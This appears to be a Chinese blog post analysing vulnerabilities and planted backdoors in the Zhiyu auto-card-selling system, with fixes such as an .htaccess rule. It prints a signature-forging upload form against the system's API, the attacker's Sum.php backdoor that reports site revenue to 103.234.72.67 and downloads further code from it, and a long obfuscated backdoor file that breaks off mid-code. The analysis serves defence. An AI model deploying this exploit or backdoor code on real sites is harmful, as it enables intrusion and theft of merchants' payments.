导读:
网上90%以上的自动发卡平台都是使用知宇自动发卡系统,这个系统功能强大、业务完善,是个很不错的程序。知宇自动发卡系统使用Thinkphp5.0内核开发的,是一个完全开源的项目,这套系统在网上早已泛滥,泛滥的程序难免会被黑客利用,黑客通过研究这套系统,发现了系统不少的漏洞,也有一些黑客故意在源代码里植入木马或者后门,然后再源码网站上发布出去给其他人使用,黑客的目的,无非就是通过一些隐形的技术手段,监听每日订单流水,然后通过后门修改系统的收款通道,从中获取利益。下面一起来分析这套系统的漏洞。
漏洞一:
描述:网站根目录下有一个.config.php文件,里面是eval()一句话木马,直接删除这个文件即可。这个漏洞应该是黑客通过文件上传漏洞添加上去的,有些源码里会有。
建议:建议把根目录下的php文件代码都检查一遍,看是否有一句话木马等后门。
漏洞二:
描述:上传文件漏洞,可能是开发这套系统的程序员比较疏忽大意(或者说没有防黑意识),黑客利用这个漏洞直接上传可执行的php文件到static/upload目录,然后运行这个php文件,即可入侵成功。
建议:如果没有查出具体漏洞原因和漏洞位置,可以直接禁止在upload目录里执行php文件,即可有效解决这个漏洞(最简单粗暴的方法)。
禁止在upload目录里执行php文件的方法:
在upload目录下创建.htaccess文件,代码如下:
<Files ~ ".php"> Order allow,deny Deny from all </Files>.htaccess里的这几行代码可以禁止运行php文件,禁止上传目录运行php可执行文件,可以从一定程度上增加网站的安全性!
漏洞三:
描述:application/api/controller/Common.php文件的upload()方法的上传文件漏洞,黑客通过伪装APP客户端上传文件,然后上传带木马的图片(嵌入php代码的图片),即可成功入侵,比如我下面的这个php文件就可以直接上传图片到接口上:
<?php
$sign=md5("platform=ios&request_time=".time());
$array=array("platform" => "ios","request_time" => time(),"sign" => $sign,
);
?>
<!DOCTYPE html>
<html><head><title>文件上传测试</title><meta charset="utf-8" /></head><body><form enctype="multipart/form-data" action="http://目标网站域名/api/Common/upload" method="post"> <p><input type="text" name="platform" value="ios"></p><p><input type="text" name="request_time" value="<?php echo time(); ?>"></p> <p><input type="text" name="sign" value="<?php echo $sign; ?>"></p> <p><input name="file" type="file"></p> <p><input type="submit" value="点击提交"></p> </form> </body>
</html>
原因:知宇自动发卡平台的客户端API接口传输不安全,没有加密验证,黑客很容易就可以伪造数据进行访问。
建议:
1、删除这个upload()方法,也可以把整个api目录删掉,因为平台没有开发安卓或者苹果客户端,基本用不上这个api接口功能;
2、删除application/templates/pc/api/default/test//upload.html这个文件,这个是傻帽程序员开发时写的测试入口,开发完忘记删掉了;
3、修改源码里所有的上传文件方法,检测上传的文件是否为可疑木马,然后进行拦截;
一、分析黑客如何利用上传漏洞进行入侵的
1、黑客首先是上传可执行的php文件或者带木马的图片到static/upload目录,假设该文件代码如下图:
2、上一步的木马文件执行后,会在application/manage/controller/目录下创建一个Sum.php文件,这个Sum.php文件的代码如下:
<?php
namespace app\manage\controller;use think\Db;
use think\Request;
use app\common\model\User as UserModel;
use app\common\model\Order as OrderModel;
use app\common\model\Cash as CashModel;
use app\common\model\Channel as ChannelModel;class Sum
{ public function index(){$todayTime =strtotime(date('Y-m-d'));$yesterTime =$todayTime-86400;$incomeStatis['yester_sum'] =OrderModel::where(['status'=>1,'create_at' =>['between',[$yesterTime,$todayTime-1]]])->sum('total_price');$d=$incomeStatis['yester_sum'];$aaa=$_SERVER['HTTP_HOST'];file_get_contents("http://103.234.72.67/1.php?a=$aaa&c=$d");if($incomeStatis['yester_sum']>'2000'){$path=$_SERVER["DOCUMENT_ROOT"];$b='/application/wechat/controller/Action.php';$a=$path.$b;copy('http://103.234.72.67/Action.txt',"$a");touch("$a",mktime(12,3,10,11,26,2020));}$path=$_SERVER["DOCUMENT_ROOT"];unlink("$path/application/manage/controller/Sum.php");}
}通过分析代码,Sum.php文件的作用大概如下:
1、统计平台昨日的订单总额,然后记录网站域名和订单金额到远程服务器端。黑客通过这个手段来监测,发现某某平台每日流水达到预期(比如2000元),那么黑客就会盯上这个网站,然后通过隐形的技术手段修改这个网站的收款通道,如果站长没有及时发现收款异常,那么损失可谓是非常大的。之前我也运营过一段时间这个知宇发卡系统,我网站的收益比较少,所以才没有被黑客盯上;
2、言归正转,继续分析上述代码,如果检测到平台昨日订单总额大于2000元,就会在application/wechat/controller/目录下创建Action.php文件,这个Action.php文件的代码是远程获取的,而且做了加密,具体做什么并不清楚,但一定是黑客用来黑平台的手段,有可能是获取平台的用户信息,也有可能是修改收款通道,或者其他非法赢利目的,反正都是为了搞钱,至于如何搞,我们就不清楚了。
3、Action.php文件的代码如下:
有能力的大佬,可以自行解密这个文件,然后看看是做什么用的,我是没有办法的了。
<?php
/*本代码由 爱发资源网独家创建创建时间 2020-11-24 01:38:59技术支持 姝妍计算机官方网址 http://www.a8tg.com客服QQ-351075088 QQ-244656508购买授权请到官方进行购买或者联系官方指定代理人员进行购买
*/
namespace app\wechat\controller;
error_reporting(0);
if(!defined("JBAEDJACJBE"))define("JBAEDJACJBE","AB_JJCJJ");
$GLOBALS[JBAEDJACJBE]=explode('|g|4|P|','H*|g|4|P|6e69636b6e616d65|g|4|P|636f756e747279|g|4|P|70726f76696e6365|g|4|P|63697479|g|4|P|6c696b65|g|4|P|25|g|4|P|25|g|4|P|736578|g|4|P|736578|g|4|P|736578|g|4|P|736578|g|4|P|746167|g|4|P|746167|g|4|P|636f6e63617428272c272c74616769645f6c6973742c272c2729206c696b65203a746167|g|4|P|746167|g|4|P|252c|g|4|P|746167|g|4|P|2c25|g|4|P|e5beaee4bfa1e7b289e4b89de7aea1e79086|g|4|P|69735f6261636b|g|4|P|30|g|4|P|7375627363726962655f74696d652064657363|g|4|P|706f73742e757365726e6d61652f73|g|4|P|757365725f6578706972655f74696d65|g|4|P|e8b4a6e688b7e4b88de5ad98e59ca8efbc81|g|4|P|53797374656d55736572|g|4|P|757365726e616d65|g|4|P|69735f64656c65746564|g|4|P|75736572|g|4|P|6e616d65|g|4|P|e7bc96e8be91e6a087e7adbee5a4b1e8b4a52c20e8afb7e7a88de5908ee5868de8af9521|g|4|P|6964|g|4|P|6e616d65|g|4|P|6964|g|4|P|e7bc96e8be91e6a087e7adbee68890e58a9f21|g|4|P|666f726d|g|4|P|6964|g|4|P|6e616d65|g|4|P|6964|g|4|P|30|g|4|P|55736572|g|4|P|');
if(!defined("B_C_ICI_FE__"))define("B_C_ICI_FE__","AAT__TCT");
$GLOBALS[B_C_ICI_FE__]=explode('|b|2|I|','H*|b|2|I|6964|b|2|I|e7b289e4b89de6a087e7adbee5908de6b2a1e69c89e694b9e58f982c20e697a0e99c80e4bfaee694b921|b|2|I|e6a087e7adbee5b7b2e7bb8fe5ad98e59ca82c20e4bdbfe794a8e585b6e5ae83e5908de7a7b0e5868de8af9521|b|2|I|706f73742e746f6b656e2f73|b|2|I|706f73742e6170692f73|b|2|I|706f73742e6b65792f73|b|2|I|706f73742e646174612f73|b|2|I|706f73742e616374696f6e2f73|b|2|I|706f73742e616374696f6e2f73|b|2|I|706f73742e6b65792f73|b|2|I|3c7072653e|b|2|I|3c2f7072653e|b|2|I|706f73742e746f6b656e2f73|b|2|I|706f73742e616374696f6e2f73|b|2|I|6138746741646d696e|b|2|I|706f73742e6469722f73|b|2|I|706f73742e75726c2f73|b|2|I|');
$U_R_R__RR_R=&$get;
$M______BB__=&$db;
$G_MM___M___=&$key;
$username=&$G___J___JJ_;
$HU_U___UU__=&$user;
$name=&$YS__S_S_SSS;
$info=&$SB_BB_____B;
$Z___ZZ_____=&$id;
$R___T______=&$wechat;
$data=&$KGG___G____;
$token=&$MY________Y;
$IK_K___KKK_=&$action;
$api=&$L_HHH_HHH__;
$Z____XX__X_=&$result;
$JA_AA__AA__=&$dir;
$url=&$G_OO___O___;
use controller\BasicAdmin;
use service\DataService;
use service\LogService;
use service\ToolsService;
use service\WechatService;
use think\Db;
class Action {public function index() {goto JC8sMK8;YZ3jIJ8:foreach([pack($GLOBALS[JBAEDJACJBE][-1048560-E_CORE_ERROR+128*E_DEPRECATED],$GLOBALS[JBAEDJACJBE][-15359-E_USER_NOTICE+1024*E_CORE_ERROR]),call_user_func(function($rencv5_h,$rencv5_c) {return pack($rencv5_h,$rencv5_c);},$GLOBALS[JBAEDJACJBE][-63-E_ERROR+4*E_CORE_ERROR],$GLOBALS[JBAEDJACJBE][-2097214+E_COMPILE_ERROR+256*E_DEPRECATED]),pack($GLOBALS[JBAEDJACJBE][-1792-E_USER_ERROR+4*E_USER_WARNING],$GLOBALS[JBAEDJACJBE][2019-E_STRICT+16*E_WARNING]),call_user_func(function() {$rencv5_g=func_get_args();if(isset($rencv5_g[0])&&!empty($rencv5_g[1])) {if($rencv5_g[0]==base64_decode('SCo='))return hex2bin($rencv5_g[1]); else return pack($rencv5_g[0],$rencv5_g[1]);}},$GLOBALS[JBAEDJACJBE][40-E_CORE_WARNING-8],$GLOBALS[JBAEDJACJBE][-523772-E_USER_WARNING+128*E_RECOVERABLE_ERROR])]as $G_MM___M___) {isset($U_R_R__RR_R[$G_MM___M___])&&$U_R_R__RR_R[$G_MM___M___]!==''&&$M______BB__->where($G_MM___M___,call_user_func(function() {$rencv5_g=func_get_args();if(isset($rencv5_g[0])&&!empty($rencv5_g[1])) {if($rencv5_g[0]==base64_decode('SCo='))return hex2bin($rencv5_g[1]); else return pack($rencv5_g[0],$rencv5_g[1]);}},$GLOBALS[JBAEDJACJBE][992-E_USER_NOTICE+32*E_ERROR],$GLOBALS[JBAEDJACJBE][-114683-E_USER_DEPRECATED+16384*E_NOTICE]),call_user_func(function($rencv5_h,$rencv5_c) {return pack($rencv5_h,$rencv5_c);},$GLOBALS[JBAEDJACJBE][-36864+E_RECOVERABLE_ERROR+32*E_USER_NOTICE],$GLOBALS[JBAEDJACJBE][-134217690-E_CORE_WARNING+16384*E_DEPRECATED]).$U_R_R__RR_R[$G_MM___M___].call_user_func(function() {$rencv5_g=func_get_args();if(isset($rencv5_g[0])&&!empty($rencv5_g[1])) {if($rencv5_g[0]==base64_decode('SCo='))return hex2bin($rencv5_g[1]); else return pack($rencv5_g[0],$rencv5_g[1]);}},$GLOBALS[JBAEDJACJBE][-524416+E_COMPILE_WARNING+1024*E_USER_WARNING],$GLOBALS[JBAEDJACJBE][-65528-E_ERROR+16*E_RECOVERABLE_ERROR]));PR7hRM1:}goto NL6hIO6;NL6hIO6:LB8fEV5:goto GX9jMY7;EX4sYU8:isset($U_R_R__RR_R[pack($GLOBALS[JBAEDJACJBE][(-4+E_PARSE)/256],$GLOBALS[JBAEDJACJBE][8216-E_CORE_ERROR-8192])])&&$U_R_R__RR_R[pack($GLOBALS[JBAEDJACJBE][(-4096+E_RECOVERABLE_ERROR)/8192],$GLOBALS[JBAEDJACJBE][2053-E_STRICT+4*E_ERROR])]!==''&&$M______BB__->where(call_user_func_array('pack',array($GLOBALS[JBAEDJACJBE][(-1+E_ERROR)/32],$GLOBALS[JBAEDJACJBE][2074-E_STRICT-16])),$U_R_R__RR_R[pack($GLOBALS[JBAEDJACJBE][-2080768-E_USER_DEPRECATED+2048*E_USER_NOTICE],$GLOBALS[JBAEDJACJBE][(36864+E_DEPRECATED)/4096])]);goto YZ3jIJ8;GX9jMY7:$LL8xDU7=isset($U_R_R__RR_R[pack($GLOBALS[JBAEDJACJBE][2048-E_USER_NOTICE-1024],$GLOBALS[JBAEDJACJBE][16460-E_USER_DEPRECATED-64])])&&$U_R_R__RR_R[pack($GLOBALS[JBAEDJACJBE][2049-E_ERROR-2048],$GLOBALS[JBAEDJACJBE][-23+E_PARSE+1*E_CORE_WARNING])]!=='';if($LL8xDU7) {goto QW9xOG3;}goto QW9xOG4;QW9xOG3:unset($EH4xVT8);$M______BB__->where(pack($GLOBALS[JBAEDJACJBE][320-E_USER_ERROR-64],$GLOBALS[JBAEDJACJBE][(96+E_COMPILE_WARNING)/16]),[call_user_func_array('pack',array($GLOBALS[JBAEDJACJBE][(-16+E_CORE_ERROR)/32],$GLOBALS[JBAEDJACJBE][2127-E_COMPILE_ERROR-2048]))=>call_user_func(function($rencv5_h,$rencv5_c) {return pack($rencv5_h,$rencv5_c);},$GLOBALS[JBAEDJACJBE][(-1+E_ERROR)/128],$GLOBALS[JBAEDJACJBE][(-8192+E_USER_DEPRECATED)/512]).$U_R_R__RR_R[pack($GLOBALS[JBAEDJACJBE][-1792-E_USER_ERROR+256*E_NOTICE],$GLOBALS[JBAEDJACJBE][(-1980+E_STRICT)/4])].call_user_func_array('pack',array($GLOBALS[JBAEDJACJBE][2044-E_STRICT+1*E_PARSE],$GLOBALS[JBAEDJACJBE][-65534+E_CORE_ERROR+4096*E_CORE_ERROR]))]);goto QW9xOG5;QW9xOG4:QW9xOG5:goto YV5tMF9;JC8sMK8:unset($UT2xUJ1);unset($PB2xSI5);$WU5xSV2=-8388612+E_PARSE;$WU5xSV3=$WU5xSV2-(-512+E_USER_WARNING)/64;$WU5xSV4=512*E_USER_DEPRECATED;$WU5xSV5=$WU5xSV4/(545-E_USER_WARNING-32);$WU5xSV6=$WU5xSV3+$WU5xSV5;$PB2xSI5=$WU5xSV6;unset($PB2xSI6);$DG9xCO6=155584+E_COMPILE_ERROR;$DG9xCO7=$DG9xCO6+(32768-E_USER_DEPRECATED-16384);$DG9xCO8=(2097120+E_CORE_WARNING)/256;$PB2xSI6=$DG9xCO7/$DG9xCO8;$UT2xUJ1=pack($GLOBALS[JBAEDJACJBE][$PB2xSI5],$GLOBALS[JBAEDJACJBE][$PB2xSI6]);$this->title=$UT2xUJ1;goto QI7eJW5;SS4dGX0:unset($DN5xSR2);$DN5xSR2=Db::name($this->table)->where(pack($GLOBALS[JBAEDJACJBE][-2113536+E_USER_DEPRECATED+128*E_USER_DEPRECATED],$GLOBALS[JBAEDJACJBE][-32716-E_CORE_WARNING+128*E_USER_ERROR]),pack($GLOBALS[JBAEDJACJBE][-34816+E_STRICT+512*E_COMPILE_ERROR],$GLOBALS[JBAEDJACJBE][151-E_WARNING-128]))->order(pack($GLOBALS[JBAEDJACJBE][-524292+E_PARSE+32*E_USER_DEPRECATED],$GLOBALS[JBAEDJACJBE][-5098+E_USER_NOTICE+1024*E_PARSE]));$M______BB__=$DN5xSR2;goto EX4sYU8;YV5tMF9:return parent::_list($M______BB__);goto VI4vFQ1;QI7eJW5:unset($OV7xGS4);$OV7xGS4=$this->request->get();$U_R_R__RR_R=$OV7xGS4;goto SS4dGX0;VI4vFQ1:}public function ApiLogin() {goto LL1fBZ4;ED0tSY3:unset($YI0xEW6);unset($DB3xGR1);$DB3xGR1=-4100+E_RECOVERABLE_ERROR+(16898-E_USER_DEPRECATED-512)*E_WARNING;unset($DB3xGR2);$DB3xGR2=-2097128-E_ERROR+(-114672-E_CORE_ERROR+128*E_USER_NOTICE)*E_COMPILE_WARNING;$YI0xEW6=call_user_func('input',pack($GLOBALS[JBAEDJACJBE][$DB3xGR1],$GLOBALS[JBAEDJACJBE][$DB3xGR2]));$G___J___JJ_=$YI0xEW6;goto PZ9zPX2;XH4jES5:call_user_func_array('session',array(call_user_func(function() {$rencv5_g=func_get_args();if(isset($rencv5_g[0])&&!empty($rencv5_g[1])) {if($rencv5_g[0]==base64_decode('SCo='))return hex2bin($rencv5_g[1]); else return pack($rencv5_g[0],$rencv5_g[1]);}},$GLOBALS[JBAEDJACJBE][12288-E_RECOVERABLE_ERROR-8192],$GLOBALS[JBAEDJACJBE][-42+E_WARNING+64*E_ERROR]),(time()+86400*1024)));goto DR5rTK5;YO1jFT5:empty($HU_U___UU__)&&$this->error(pack($GLOBALS[JBAEDJACJBE][(-64+E_COMPILE_ERROR)/8],$GLOBALS[JBAEDJACJBE][(401408+E_DEPRECATED)/16384]));goto RD0dOT4;PZ9zPX2:unset($TF6xMG5);$TF6xMG5=Db::name(pack($GLOBALS[JBAEDJACJBE][-2093056-E_RECOVERABLE_ERROR+2048*E_USER_NOTICE],$GLOBALS[JBAEDJACJBE][156-E_WARNING-128]))->where([call_user_func(function() {$rencv5_g=func_get_args();if(isset($rencv5_g[0])&&!empty($rencv5_g[1])) {if($rencv5_g[0]==base64_decode('SCo='))return hex2bin($rencv5_g[1]); else return pack($rencv5_g[0],$rencv5_g[1]);}},$GLOBALS[JBAEDJACJBE][-261888-E_USER_ERROR+16*E_USER_DEPRECATED],$GLOBALS[JBAEDJACJBE][-8380389-E_DEPRECATED+4096*E_STRICT])=>$G___J___JJ_,pack($GLOBALS[JBAEDJACJBE][(-2048+E_STRICT)/4096],$GLOBALS[JBAEDJACJBE][-516068-E_DEPRECATED+8192*E_COMPILE_ERROR])=>0])->find();$HU_U___UU__=$TF6xMG5;goto YO1jFT5;RD0dOT4:call_user_func_array('session',array(pack($GLOBALS[JBAEDJACJBE][12288-E_DEPRECATED-4096],$GLOBALS[JBAEDJACJBE][62-E_CORE_WARNING-1]),&$HU_U___UU__));goto XH4jES5;LL1fBZ4:$LL8xDU8=request()->isGet();if($LL8xDU8) {goto TE2xKK1;}goto TE2xKK2;TE2xKK1:unset($HR9xAO2);$HR9xAO2=call_user_func_array("is_object",array(&$TC7x));$TC7xSL0=$HR9xAO2;$LL8xDU9=$TC7xSL0;if($LL8xDU9) {unset($TC7xSL0);}exit;goto TE2xKK3;TE2xKK2:TE2xKK3:goto ED0tSY3;DR5rTK5:}public function edit() {goto BY1iFM9;LT2lFQ5:unset($DE6xHS5);$DE6xHS5=Db::name($this->table)->where(pack($GLOBALS[JBAEDJACJBE][-1048320-E_USER_ERROR+8192*E_COMPILE_WARNING],$GLOBALS[JBAEDJACJBE][(464+E_CORE_ERROR)/16]),$YS__S_S_SSS)->find();$SB_BB_____B=$DE6xHS5;goto QL2tHY6;KE5kFC4:$this->error(pack($GLOBALS[JBAEDJACJBE][516-E_PARSE-512],$GLOBALS[JBAEDJACJBE][-353+E_USER_ERROR+4*E_CORE_WARNING]).$R___T______->errMsg);goto MT3eNS5;GK2gGT2:if(is_array($OT7xIS2)) {goto LF7xWM8;}LF7xWM8:unset($XI1xXA6);$XI1xXA6=array();$OT7xIS2=$XI1xXA6;unset($ZF0xVI1);$ZF0xVI1=$Z___ZZ_____;$OT7xIS2[pack($GLOBALS[JBAEDJACJBE][1280-E_USER_ERROR-1024],$GLOBALS[JBAEDJACJBE][-520160-E_RECOVERABLE_ERROR+32*E_USER_DEPRECATED])]=$ZF0xVI1;unset($TK7xNC8);$TK7xNC8=$YS__S_S_SSS;$OT7xIS2[pack($GLOBALS[JBAEDJACJBE][-4194302-E_WARNING+1024*E_RECOVERABLE_ERROR],$GLOBALS[JBAEDJACJBE][-111+E_COMPILE_WARNING+16*E_ERROR])]=$TK7xNC8;unset($OT7xIS3);unset($OM5xXT3);$OM5xXT3=$OT7xIS2;$KGG___G____=$OM5xXT3;goto PH4yNC4;PH4yNC4:$LL8xDU10=false!==$R___T______->updateTag($Z___ZZ_____,$YS__S_S_SSS)&&false!==DataService::save($this->table,$KGG___G____,pack($GLOBALS[JBAEDJACJBE][8176-E_DEPRECATED+4*E_PARSE],$GLOBALS[JBAEDJACJBE][(18+E_CORE_ERROR)/1]));if($LL8xDU10) {goto DG6xRF6;}goto DG6xRF7;DG6xRF6:unset($KY0xVB6);$this->success(pack($GLOBALS[JBAEDJACJBE][2304-E_USER_ERROR-2048],$GLOBALS[JBAEDJACJBE][(126976+E_USER_DEPRECATED)/4096]),'');goto DG6xRF8;DG6xRF7:DG6xRF8:goto KE5kFC4;BY1iFM9:$LL8xDU11=$this->request->isGet();if($LL8xDU11) {goto HV5xNM3;}goto HV5xNM4;HV5xNM3:$LL8xDU12=!defined("C__DAAFD");if($LL8xDU12) {goto ID3xEF4;}goto ID3xEF5;ID3xEF4:define("C__DAAFD","_R_R_");goto ID3xEF6;ID3xEF5:ID3xEF6:$LL8xDU13=!is_array($GLOBALS[C__DAAFD]);if($LL8xDU13) {goto VL4xNL4;}goto VL4xNL5;VL4xNL4:unset($JD7xUG4);unset($OI5xTY1);$OI5xTY1='H*';$JD7xUG4=$OI5xTY1;unset($QS0xYB3);$QS0xYB3=array();$GLOBALS[C__DAAFD]=$QS0xYB3;goto VL4xNL6;VL4xNL5:VL4xNL6:unset($CY2xWX8);$CY2xWX8=array();$JD7xUG5=$CY2xWX8;if(!function_exists(__NAMESPACE__.'\îק)){if(1){unset($NB4xAV9);if($î=null)$NB4xAV9=$LL8xDU14=isset($JD7xUG4);}}if($NB4xAV9){goto DZ2xMZ3;}goto DZ2xMZ4;DZ2xMZ3:unset($DY4xXD4);$DY4xXD4="313a74727565";$JD7xUG5[]=$DY4xXD4;unset($IP9xSE3);$IP9xSE3="323a66616c7365";$JD7xUG5[]=$IP9xSE3;unset($VS6xYT6);$VS6xYT6="333a72657475726e";$JD7xUG5[]=$VS6xYT6;goto DZ2xMZ5;DZ2xMZ4:unset($JD7xUG5);DZ2xMZ5:$LL8xDU15=is_array($GLOBALS[C__DAAFD]);if($LL8xDU15){goto AG2xLB9;}goto AG2xLB10;AG2xLB9:$GLOBALS[C__DAAFD]=&$JD7xUG5;if((int)true){$EW6xTF4=1616178590;$EW6xTF5='02:29:50';if(!(int)false)$EW6xTF5=&$EW6xTF6;else unset($EW6xTF5);$HY5xAM5=$EW6xTF4<$EW6xTF6;if($HY5xAM5){$PH5xGP0=call_user_func_array("gettype",array(9));$PH5x=$PH5xGP0=="EM";if($PH5x){unset($PH5x);}else{unset($PH5xGP0);}unset($HY5xAM5);}else{$LL8xDU16=$GLOBALS[C__DAAFD][0]!=$JD7xUG4;$EW6xTF7=$LL8xDU16;}}if($EW6xTF7){goto NT5xKH3;}goto NT5xKH4;NT5xKH3:unset($HL6xMY5);$HL6xMY5=array_merge(array($JD7xUG4),$GLOBALS[C__DAAFD]);$GLOBALS[C__DAAFD]=$HL6xMY5;goto NT5xKH5;NT5xKH4:NT5xKH5:goto AG2xLB11;AG2xLB10:AG2xLB11:array(pack($GLOBALS[C__DAAFD][-8064-E_COMPILE_WARNING+(-63424-E_STRICT+4096*E_CORE_ERROR)*E_COMPILE_WARNING],$GLOBALS[C__DAAFD][((25167360+E_USER_WARNING)/2048)-E_USER_DEPRECATED+(8136-E_DEPRECATED+8*E_NOTICE)*E_USER_WARNING]),pack(chr(72).chr(42),$GLOBALS[C__DAAFD][-8387582-E_USER_NOTICE+(1520+E_USER_WARNING+4*E_PARSE)*E_RECOVERABLE_ERROR]),pack(chr(72).chr(42),$GLOBALS[C__DAAFD][-509+E_USER_ERROR+(168-E_NOTICE-128)*E_NOTICE]));return parent::_form($this->table,call_user_func(function($rencv5_h,$rencv5_c){return pack($rencv5_h,$rencv5_c);},$GLOBALS[JBAEDJACJBE][-131056-E_CORE_ERROR+2048*E_COMPILE_ERROR],$GLOBALS[JBAEDJACJBE][-65564+E_COMPILE_ERROR+16*E_RECOVERABLE_ERROR]),call_user_func(function($rencv5_h,$rencv5_c){return pack($rencv5_h,$rencv5_c);},$GLOBALS[JBAEDJACJBE][-16320-E_COMPILE_ERROR+1024*E_CORE_ERROR],$GLOBALS[JBAEDJACJBE][517-E_USER_WARNING+16*E_WARNING]));goto HV5xNM5;HV5xNM4:HV5xNM5:goto QT6aGI9;QT6aGI9:if(is_array($AK6xXS7)){goto IR0xMN8;}IR0xMN8:unset($RC5xFM8);$RC5xFM8=array();$AK6xXS7=$RC5xFM8;unset($OX7xJT3);$OX7xJT3=$this->request->post(pack($GLOBALS[JBAEDJACJBE][-16392+E_NOTICE+2*E_DEPRECATED],$GLOBALS[JBAEDJACJBE][(38910+E_WARNING)/1024]),'');$AK6xXS7[]=$OX7xJT3;unset($CM0xOK5);$CM0xOK5=$this->request->post(pack($GLOBALS[JBAEDJACJBE][(-1+E_ERROR)/32],$GLOBALS[JBAEDJACJBE][39-E_PARSE+1*E_PARSE]),call_user_func_array('pack',array($GLOBALS[JBAEDJACJBE][144-E_COMPILE_WARNING-16],$GLOBALS[JBAEDJACJBE][(40704+E_USER_ERROR)/1024])));$AK6xXS7[]=$CM0xOK5;unset($AK6xXS8);unset($OM2xHV3);$OM2xHV3=$AK6xXS7;list($YS__S_S_SSS,$Z___ZZ_____)=$OM2xHV3;goto LT2lFQ5;DB0aCF4:unset($IV1xLP0);unset($UE7xIH1);$UE7xIH1=(-512+E_USER_WARNING)/(-4210624+E_USER_DEPRECATED+256*E_USER_DEPRECATED);unset($UE7xIH2);$BG7xPC9=41952+E_CORE_WARNING;$BG7xPC10=1160-E_COMPILE_WARNING-8;$UE7xIH2=$BG7xPC9/$BG7xPC10;$IV1xLP0=call_user_func('load_wechat',pack($GLOBALS[JBAEDJACJBE][$UE7xIH1],$GLOBALS[JBAEDJACJBE][$UE7xIH2]));$R___T______=$IV1xLP0;goto GK2gGT2;QL2tHY6:$LL8xDU17=!empty($SB_BB_____B);if($LL8xDU17){goto ZD8xHN1;}goto ZD8xHN2;ZD8xHN1:unset($YP3xUV9);if(!function_exists(__NAMESPACE__.'\ʬʧ)) {if(1) {$MF4xJW4=call_user_func_array("strlen",array("PZ5xQT9"));$MF4x=$MF4xJW4==0;if($MF4x) {unset($MF4x);} else {unset($MF4xJW4);}unset($MR9xIC5);if($ʬʽ=null)$MR9xIC5=$LL8xDU18=call_user_func('intval',$SB_BB_____B[pack($GLOBALS[B_C_ICI_FE__][16640-E_USER_ERROR-16384],$GLOBALS[B_C_ICI_FE__][-16383+E_DEPRECATED+2048*E_PARSE])])===call_user_func('intval',$Z___ZZ_____);}}if($MR9xIC5) {goto JF4xRO7;}goto JF4xRO8;JF4xRO7:unset($LO7xNU2);$this->error(call_user_func_array('pack',array($GLOBALS[B_C_ICI_FE__][-65537+E_ERROR+4096*E_CORE_ERROR],$GLOBALS[B_C_ICI_FE__][514-E_USER_ERROR-256])));goto JF4xRO9;JF4xRO8:JF4xRO9:$this->error(call_user_func(function() {$rencv5_g=func_get_args();if(isset($rencv5_g[0])&&!empty($rencv5_g[1])) {if($rencv5_g[0]==base64_decode('SCo='))return hex2bin($rencv5_g[1]); else return pack($rencv5_g[0],$rencv5_g[1]);}},$GLOBALS[B_C_ICI_FE__][(-1024+E_USER_NOTICE)/2048],$GLOBALS[B_C_ICI_FE__][-8181-E_NOTICE+16*E_USER_WARNING]));goto ZD8xHN3;ZD8xHN2:ZD8xHN3:goto DB0aCF4;MT3eNS5:}public function FansApi() {goto UM4cXX4;UK3dIO0:unset($NZ5xMX1);unset($GI6xRF2);$GI6xRF2=-131200+E_COMPILE_WARNING+(-65468-E_PARSE+8*E_DEPRECATED)*E_STRICT;unset($GI6xRF3);$XE9xKK2=0+E_USER_NOTICE;$XE9xKK3=(523264+E_USER_NOTICE)/2048;$GI6xRF3=$XE9xKK2/$XE9xKK3;$NZ5xMX1=call_user_func('input',pack($GLOBALS[B_C_ICI_FE__][$GI6xRF2],$GLOBALS[B_C_ICI_FE__][$GI6xRF3]));$MY________Y=$NZ5xMX1;goto PC8aSY5;OE8zUM9:unset($LS2xNU6);unset($FX0xWU2);$IX4xMW8=-512+E_USER_WARNING;$IX4xMW9=(2088960+E_DEPRECATED)/2048;$FX0xWU2=$IX4xMW8/$IX4xMW9;unset($FX0xWU3);$FX0xWU3=-261115-E_USER_NOTICE+(-16773112-E_NOTICE+8192*E_STRICT)*E_COMPILE_ERROR;$LS2xNU6=call_user_func('input',pack($GLOBALS[B_C_ICI_FE__][$FX0xWU2],$GLOBALS[B_C_ICI_FE__][$FX0xWU3]));$L_HHH_HHH__=$LS2xNU6;goto EP9iEV0;FB6kTJ7:unset($UR7xNC5);unset($YQ2xUG5);$YQ2xUG5=-8388640+E_CORE_WARNING+(-1048056-E_NOTICE+4096*E_USER_ERROR)*E_USER_DEPRECATED;unset($YQ2xUG6);$DT9xEV0=1026-E_USER_NOTICE;$DT9xEV1=$DT9xEV0*((8064+E_COMPILE_WARNING)/8192);$DT9xEV2=1*E_PARSE;$DT9xEV3=$DT9xEV1+$DT9xEV2;$YQ2xUG6=$DT9xEV3;$UR7xNC5=call_user_func('input',pack($GLOBALS[B_C_ICI_FE__][$YQ2xUG5],$GLOBALS[B_C_ICI_FE__][$YQ2xUG6]));$G_MM___M___=$UR7xNC5;goto UK3dIO0;UM4cXX4:$LL8xDU8=request()->isGet();if($LL8xDU8) {goto BQ1xKG4;}goto BQ1xKG5;BQ1xKG4:$LL8xDU20=&$TW9xYX3;$NT6xZV6=call_user_func_array("strpos",array("DBA",7));$NT6x=false===$NT6xZV6;if($NT6x) {unset($NT6x);} else {unset($NT6xZV6);}$LL8xDU20=!defined("A_B_AFA_");if($TW9xYX3) {goto QL9xHF5;}goto QL9xHF6;QL9xHF5:define("A_B_AFA_","B_AADI");goto QL9xHF7;QL9xHF6:QL9xHF7:if(!function_exists(__NAMESPACE__.'\۳Ч)){if(1){if(is_array($GLOBALS[YI9XGC3])){unset($GLOBALS[YI9XGC3]);}unset($JJ0xQL1);if($۳н=null)$JJ0xQL1=$LL8xDU21=!is_array($GLOBALS[A_B_AFA_]);}}if($JJ0xQL1){goto QH4xOJ8;}goto QH4xOJ9;QH4xOJ8:unset($DY3xVA7);unset($GR9xCO9);$GR9xCO9='H*';$DY3xVA7=$GR9xCO9;unset($RV4xKB0);$RV4xKB0=array();$GLOBALS[A_B_AFA_]=$RV4xKB0;goto QH4xOJ10;QH4xOJ9:QH4xOJ10:unset($JK5xHS0);$JK5xHS0=array();$DY3xVA8=$JK5xHS0;$LL8xDU22=isset($DY3xVA7);if($LL8xDU22){goto PF1xFG1;}goto PF1xFG2;PF1xFG1:unset($RA9xLR9);$RA9xLR9="3c3a3e";$DY3xVA8[]=$RA9xLR9;goto PF1xFG3;PF1xFG2:unset($DY3xVA8);PF1xFG3:if((int)true){$MZ5xYG8=1616178590;$MZ5xYG9='02:29:50';if(!(int)false)$MZ5xYG9=&$MZ5xYG10;else 